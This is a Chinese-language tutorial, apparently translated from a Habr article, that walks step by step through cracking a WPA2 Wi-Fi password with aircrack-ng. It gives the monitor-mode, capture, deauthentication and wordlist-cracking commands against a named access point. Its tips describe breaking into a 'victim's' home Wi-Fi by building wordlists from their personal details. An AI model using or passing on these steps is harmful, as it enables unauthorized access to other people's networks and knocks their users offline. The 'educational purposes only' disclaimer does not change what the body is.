与aircrack-ng匹配的Wi-Fi密码

本文仅用于教育和研究目的。 我们敦促您遵守使用网络和法律的规则,并始终牢记信息安全性。

引言


在1990年代初期,当Wi-Fi刚刚出现时,就建立了“有线等效保密”算法,该算法应确保Wi-Fi网络的机密性。 但是,事实证明,WEP是一种无效的安全算法,易于破解。

大多数Wi-Fi接入点使用的新的Wi-Fi保护访问II保护算法已经取代了它。 WPA2使用一种很难破解的加密算法AES。

漏洞在哪里?


WPA2的缺点是,当用户在所谓的4向握手(4向握手)期间进行连接时,将传输加密密码。 如果我们握手,我们将找出加密的密码,只需要解密即可。 为此,我们将使用aircrack-ng。

那么如何破解?


步骤1.定义接口


首先,您需要找出我们需要哪个网络接口,为此,我们输入以下命令:

$ ifconfig 

我们得到答案:

 eth0     no wireless extensions. wlan0    IEEE 802.11abgn ESSID:off/any Mode:Managed Access Point: Not-Associated  Tx-Power=15 dBm Retry short limit:7  RTS thr:off  Fragment thr:off Encryption key:off Power Management:off lo       no wireless extensions 

就我而言,只有三个接口,其中两个没有无线扩展。 因此,我们只对wlan0感兴趣。

步骤2.将网络适配器置于监视模式


将网络适配器置于监视模式将使我们能够看到适合我们的无线流量。 为此,请输入命令:

 $ airmon-ng start wlan0 

请注意,airmon-ng重命名了您的接口(我开始将其命名为mon0,但您仍然应该检查)。

步骤3.我们拦截流量


现在我们的网络适配器处于监视模式,我们可以使用airodump-ng命令捕获通过我们的流量。 输入:

 $ airodump-ng mon0 

图片

请注意,所有可见的访问点都列在屏幕顶部,而客户端则列在屏幕底部。

步骤4.我们将拦截集中在特定的接入点上。


我们的下一步是将精力集中在一个接入点及其通道上。 我们对BSSID和接入点的通道号感兴趣,我们将对其进行破解。 让我们打开另一个终端并输入:

 $ airodump-ng --bssid 08:86:30:74:22:76 -c 6 -w WPAcrack mon0 

图片

  • 08:86:30:74:22:76 BSSID接入点
  • -c 6通道,Wi-Fi接入点在该通道上工作
  • 写入握手的WPAcrack文件
  • mon0网络适配器处于监视模式

如您在上面的屏幕快照中所见,我们现在专注于使用通道6上的Belkin276 ESSID从一个访问点捕获数据。我们将终端保持打开状态!

步骤5.握手


要捕获加密的密码,我们需要客户端进行身份验证(连接到Wi-Fi)。 如果已通过身份验证,则可以取消身份验证(断开连接),然后系统将自动重新进行身份验证(连接),因此我们可以获得加密的密码。

也就是说,我们只需要断开连接的用户的连接,以便他们再次连接。 为此,请打开另一个终端并输入:

 $ aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0 

图片

  • 100个要取消身份验证的用户
  • 08:86:30:74:22:76 BSSID接入点
  • mon0网络适配器

现在,当重新连接时,我们在上一步中留下的窗口将捕获握手。 让我们回到终端airodump-ng看看。

图片

请注意,右侧最上面一行印有airodump-ng:“握手WPA”。 也就是说,我们成功捕获了加密的密码! 这是成功的第一步!

步骤6.选择一个密码


现在我们的WPAcrack文件中已经有加密的密码,我们可以开始密码猜测了。 但是为此,我们需要有一个我们要使用的密码列表。 您可以在5分钟内在Google中找到这样的列表。 我还将使用aircrack-ng中包含的默认密码列表:BackTrack darkcOde。

打开一个新终端,然后输入:

 $ aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de 

图片

  • 我们在其中写入握手的WPAcrack-01.cap文件(airodump-ng归属于-01.cap末尾)
  • / pentest /密码/ wordlist / darkc0de密码列表的绝对路径

需要多长时间?


此过程可能需要很长时间。 这完全取决于密码列表的长度,您可以等待几分钟到几天。 在我的双核Intel处理器上,aircrack-ng每秒可以接收800多个密码。

找到密码后,它将出现在屏幕上。 密码猜测是否成功取决于您的列表。 如果您无法从一个列表中找到密码,请不要失望,请尝试另一个。

使用技巧


  1. 这种类型的攻击对于从列表中进行密码猜测非常有效,但对于随机猜测几乎没有用。 时间到了。 如果Wi-Fi受拉丁字母和数字的平均密码保护,则随机选择将花费数年。
  2. 选择密码列表时,请务必考虑地理因素。 例如,根据俄罗斯的密码列表在巴黎餐厅进行选择是没有意义的。
  3. 如果您入侵家庭Wi-Fi,请尝试找出受害者的任何个人数据(姓名,姓氏,出生日期,狗的名字等),并从该数据中生成其他密码列表。
  4. 握手后,请关闭aireplay-ng的操作(不要使普通用户受苦)。

Source: https://habr.com/ru/post/zh-CN464503/


All Articles